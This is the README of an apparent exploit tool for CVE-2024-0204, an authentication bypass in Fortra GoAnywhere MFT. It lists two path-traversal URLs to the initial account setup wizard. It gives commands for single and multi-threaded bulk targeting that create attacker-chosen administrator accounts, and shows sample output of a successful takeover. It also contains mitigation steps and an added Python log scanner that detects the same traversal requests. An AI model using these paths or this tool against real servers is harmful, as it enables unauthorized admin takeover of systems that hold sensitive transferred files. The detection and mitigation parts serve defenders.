# CVE-2024-0204: Fortra GoAnywhere MFT Authentication Bypass Exploit

## Description

This exploit demonstrates a critical authentication bypass vulnerability in Fortra GoAnywhere MFT versions prior to 7.4.1. The vulnerability allows an unauthenticated attacker to create an administrator account by exploiting a path traversal vulnerability to access the initial account setup wizard.

CVE-2024-0204 was discovered in January 2024 and affects all GoAnywhere MFT versions prior to 7.4.1. This vulnerability has been rated as Critical (CVSS 9.8) due to its ease of exploitation and the complete administrative access it provides to vulnerable instances.

## Technical Details

The vulnerability exists due to improper access control on the initial account setup wizard. By using path traversal techniques, an attacker can access the setup wizard and create an administrator account without any authentication. The exploit implements two different path traversal methods to maximize success across various server configurations:

1. Primary method: `/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml`
2. Secondary method: `/goanywhere/..;/wizard/InitialAccountSetup.xhtml`

If the first method fails, the exploit automatically tries the second method. This dual approach increases the likelihood of successful exploitation, as different server configurations may handle path traversal differently.

## Features

- Multiple path traversal techniques to increase success rate
- Multi-target scanning support
- Colored and user-friendly output
- Multi-threading for faster scanning
- Comprehensive result summary

## Installation

```bash
# Clone the repository
git clone https://github.com/ibrahimsql/CVE-2024-0204.git
cd CVE-2024-0204

# Install dependencies
pip install -r requirements.txt
```

## Usage

### Single Target Scanning

```bash
python CVE-2024-0204.py -t example.com -u admin -p password123
```

### Multi-Target Scanning from File

```bash
python CVE-2024-0204.py -f targets.txt -u admin -p password123 --threads 20
```

### Command Line Arguments

```
-t, --target       Target host to check (e.g., 'example.com' or '192.168.1.1')
-f, --file         File containing targets, one per line
-u, --username     Username for the admin account to create
-p, --password     Password for the admin account to create
--timeout          Connection timeout in seconds (default: 10)
--threads          Number of concurrent threads for scanning (default: 10)
```

## Example Output

```
[*] Checking single target: vulnerable.example.com
[+] vulnerable.example.com - Potentially vulnerable via /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml!
[+] vulnerable.example.com - Admin account created successfully via /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml! Username: admin, Password: password123

[*] Scan Summary:
[+] Vulnerable targets: 1
[-] Non-vulnerable targets: 0
[!] Error targets: 0

[+] Vulnerable targets:
  - vulnerable.example.com
```

## Mitigation

To mitigate this vulnerability, system administrators should:

1. Upgrade to GoAnywhere MFT version 7.4.1 or higher
2. Apply the workaround provided by Fortra by deleting or emptying the InitialAccountSetup.xhtml file
3. Restrict access to the administrative interfaces at the network level
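To check whether an instance has already been probed, the following added example (not part of this repository's tool) scans web access logs for requests that reach the setup wizard, flagging the `..;` traversal segment used by the two paths listed under Technical Details. It assumes an Apache/Tomcat combined-format access log; the sample lines and the names `classify` and `scan` are constructed for illustration.

```python
import re
from urllib.parse import unquote

WIZARD = "/wizard/initialaccountsetup.xhtml"  # compared case-insensitively
# Assumption: Apache/Tomcat combined access log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Jan/2024:10:01:02 +0000] '
    '"GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 5120',
    '203.0.113.7 - - [23/Jan/2024:10:01:05 +0000] '
    '"POST /goanywhere/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 302 0',
    '198.51.100.9 - - [23/Jan/2024:10:02:00 +0000] "GET /goanywhere/ HTTP/1.1" 200 2048',
    '198.51.100.9 - - [23/Jan/2024:10:03:00 +0000] '
    '"GET /goanywhere/wizard/InitialAccountSetup.xhtml HTTP/1.1" 302 0',
]

def classify(line):
    """Return a finding dict if the request targets the setup wizard, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Drop the query string, then percent-decode and lowercase before matching.
    path = unquote(m["target"].split("?", 1)[0]).lower()
    if WIZARD not in path:
        return None
    # "..;" as a path segment is the traversal marker in both listed paths.
    traversal = any(seg.startswith("..;") for seg in path.split("/"))
    return {
        "ip": m["ip"], "time": m["ts"], "method": m["method"],
        "status": int(m["status"]),
        "kind": "traversal" if traversal else "direct",
    }

def scan(lines):
    """Classify every line and keep only the wizard hits, in log order."""
    return [f for f in map(classify, lines) if f]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['method']} {f['status']} {f['kind']}")
```

Any `traversal` hit on a system whose initial setup is already complete is worth following up by reviewing the list of administrator accounts for entries nobody recognizes.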

## Warning

This tool is intended for ethical hacking, penetration testing, and security research purposes only. Using this tool to access unauthorized systems may be illegal. Always work with written permission from the target system's owner. The author is not responsible for any misuse of this tool.

## License

This project is licensed under the MIT License - see the LICENSE file for details.

## Author

**@ibrahimsql** - [GitHub](https://github.com/ibrahimsql)
